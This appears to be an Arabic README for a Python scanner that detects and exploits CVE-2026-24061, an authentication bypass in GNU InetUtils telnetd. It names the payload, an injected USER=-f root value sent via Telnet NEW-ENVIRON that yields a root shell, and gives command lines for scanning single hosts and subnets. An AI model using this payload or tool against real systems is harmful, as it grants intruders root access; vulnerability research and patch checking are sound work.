
CVE-2026-24061 — ماسح تجاوز المصادقة لـ GNU InetUtils Telnetd
ماسح أمني مبني على بايثون يكتشف ويستغل CVE-2026-24061، وهي ثغرة خطيرة (CVSS 9.8) لتجاوز المصادقة في إصدارات GNU InetUtils telnetd من 1.9.3 حتى 2.7.
يقوم الماسح بحقن قيمة USER=-f root ضارة عبر خيار Telnet NEW-ENVIRON (RFC 1572)، مما يخدع الخادم لتخطي المصادقة ومنح شل جذر.
id# مسح هدف واحد
sudo python3 telnetd_scanner.py -t 192.168.56.101 -p 23 -v
# مسح شبكة فرعية كاملة
sudo python3 telnetd_scanner.py -t 192.168.56.0/24 --threads 30
# حفظ تقرير
sudo python3 telnetd_scanner.py -t 192.168.56.101 -o report.txt
# إخراج بصيغة JSON
sudo python3 telnetd_scanner.py -t 192.168.56.101 --format json -o report.json
| البرنامج | المُعرَّض | المُصَلَّح |
|---|---|---|
| GNU InetUtils telnetd | <= 2.7 | >= 2.8 |
هذه الأداة مخصصة للبحث الأمني المصرح به ولأغراض تعليمية فقط. لا تستخدمها ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها.
Ahmad Sadeeq